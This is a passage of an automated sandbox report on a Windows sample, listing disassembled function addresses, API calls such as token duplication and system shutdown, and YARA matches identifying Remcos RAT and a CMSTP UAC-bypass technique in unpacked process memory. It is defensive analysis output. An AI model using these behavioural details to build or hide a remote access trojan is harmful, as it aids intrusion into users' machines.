                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C716DE GetParent,NtdllDialogWndProc_W,0_2_00C716DE
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C716B5 NtdllDialogWndProc_W,0_2_00C716B5
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7167D NtdllDialogWndProc_W,0_2_00C7167D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00CFD74C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7189B NtdllDialogWndProc_W,0_2_00C7189B
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFDA9A NtdllDialogWndProc_W,0_2_00CFDA9A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CFBF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00CFBF4D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00023633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00023633
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AC220 NtdllDialogWndProc_W,2_2_000AC220
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_000AC27C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_000AC49C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_000AC788
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AC86D SendMessageW,NtdllDialogWndProc_W,2_2_000AC86D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_000AC8EE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ACB50 NtdllDialogWndProc_W,2_2_000ACB50
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ACB7F NtdllDialogWndProc_W,2_2_000ACB7F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ACBAE NtdllDialogWndProc_W,2_2_000ACBAE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ACBF9 NtdllDialogWndProc_W,2_2_000ACBF9
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ACC2E ClientToScreen,NtdllDialogWndProc_W,2_2_000ACC2E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ACD6C GetWindowLongW,NtdllDialogWndProc_W,2_2_000ACD6C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ACDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_000ACDAC
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00021287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,2_2_00021287
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00021290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_00021290
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0002167D NtdllDialogWndProc_W,2_2_0002167D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000216B5 NtdllDialogWndProc_W,2_2_000216B5
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AD6C6 NtdllDialogWndProc_W,2_2_000AD6C6
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000216DE GetParent,NtdllDialogWndProc_W,2_2_000216DE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000AD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,2_2_000AD74C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0002189B NtdllDialogWndProc_W,2_2_0002189B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ADA9A NtdllDialogWndProc_W,2_2_000ADA9A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ABF4D NtdllDialogWndProc_W,CallWindowProcW,2_2_000ABF4D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00CD40B1
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74765590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00CC8858
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CD545F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0008545F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_004167EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004167EF
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7E8000_2_00C7E800
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9DBB50_2_00C9DBB5
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7FE400_2_00C7FE40
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CF804A0_2_00CF804A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C7E0600_2_00C7E060
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C841400_2_00C84140
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C924050_2_00C92405
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA65220_2_00CA6522
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CF06650_2_00CF0665
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA267E0_2_00CA267E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C868430_2_00C86843
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9283A0_2_00C9283A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA89DF0_2_00CA89DF
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CF0AE20_2_00CF0AE2
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA6A940_2_00CA6A94
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C88A0E0_2_00C88A0E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CCEB070_2_00CCEB07
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD8B130_2_00CD8B13
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9CD610_2_00C9CD61
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA70060_2_00CA7006
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C831900_2_00C83190
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C8710E0_2_00C8710E
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C712870_2_00C71287
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C933C70_2_00C933C7
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9F4190_2_00C9F419
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C916C40_2_00C916C4
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C856800_2_00C85680
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C858C00_2_00C858C0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C978D30_2_00C978D3
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C91BB80_2_00C91BB8
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA9D050_2_00CA9D05
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C91FD00_2_00C91FD0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9BFE60_2_00C9BFE6
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_031436500_2_03143650
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0002E8002_2_0002E800
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004DBB52_2_0004DBB5
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0002FE402_2_0002FE40
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000A804A2_2_000A804A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0002E0602_2_0002E060
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000341402_2_00034140
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000424052_2_00042405
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000565222_2_00056522
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000A06652_2_000A0665
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0005267E2_2_0005267E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004283A2_2_0004283A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000368432_2_00036843
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000589DF2_2_000589DF
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00038A0E2_2_00038A0E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00056A942_2_00056A94
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000A0AE22_2_000A0AE2
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0007EB072_2_0007EB07
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00088B132_2_00088B13
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004CD612_2_0004CD61
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000570062_2_00057006
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0003710E2_2_0003710E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000331902_2_00033190
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000212872_2_00021287
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000433C72_2_000433C7
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004F4192_2_0004F419
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000356802_2_00035680
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000416C42_2_000416C4
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000358C02_2_000358C0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000478D32_2_000478D3
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00041BB82_2_00041BB8
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00059D052_2_00059D05
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00041FD02_2_00041FD0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004BFE62_2_0004BFE6
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F736502_2_03F73650
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 4_2_00D336504_2_00D33650
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043706A5_2_0043706A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004140055_2_00414005
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043E11C5_2_0043E11C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004541D95_2_004541D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004381E85_2_004381E8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041F18B5_2_0041F18B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004462705_2_00446270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043E34B5_2_0043E34B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004533AB5_2_004533AB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042742E5_2_0042742E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004375665_2_00437566
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043E5A85_2_0043E5A8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004387F05_2_004387F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043797E5_2_0043797E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004339D75_2_004339D7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0044DA495_2_0044DA49
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00427AD75_2_00427AD7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041DBF35_2_0041DBF3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00427C405_2_00427C40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00437DB35_2_00437DB3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00435EEB5_2_00435EEB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043DEED5_2_0043DEED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00426E9F5_2_00426E9F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0326365011_2_03263650
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043706A12_2_0043706A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041400512_2_00414005
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043E11C12_2_0043E11C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004541D912_2_004541D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004381E812_2_004381E8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041F18B12_2_0041F18B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0044627012_2_00446270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043E34B12_2_0043E34B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004533AB12_2_004533AB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0042742E12_2_0042742E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043756612_2_00437566
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043E5A812_2_0043E5A8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004387F012_2_004387F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043797E12_2_0043797E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004339D712_2_004339D7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0044DA4912_2_0044DA49
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00427AD712_2_00427AD7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041DBF312_2_0041DBF3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00427C4012_2_00427C40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00437DB312_2_00437DB3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00435EEB12_2_00435EEB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043DEED12_2_0043DEED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00426E9F12_2_00426E9F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00402213 appears 38 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004052FD appears 32 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040417E appears 46 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00402093 appears 100 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00401E65 appears 68 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434E70 appears 108 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00401FAB appears 38 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004020DF appears 40 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434801 appears 82 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00457AA8 appears 34 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00445951 appears 56 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0044854A appears 36 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00411FA2 appears 32 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004046F7 appears 34 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00048B40 appears 42 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00040D27 appears 70 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00027F41 appears 35 times
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: String function: 00C90D27 appears 70 times
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: String function: 00C98B40 appears 42 times
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: String function: 00C77F41 appears 35 times
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 736
                  Source: jv4ri.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
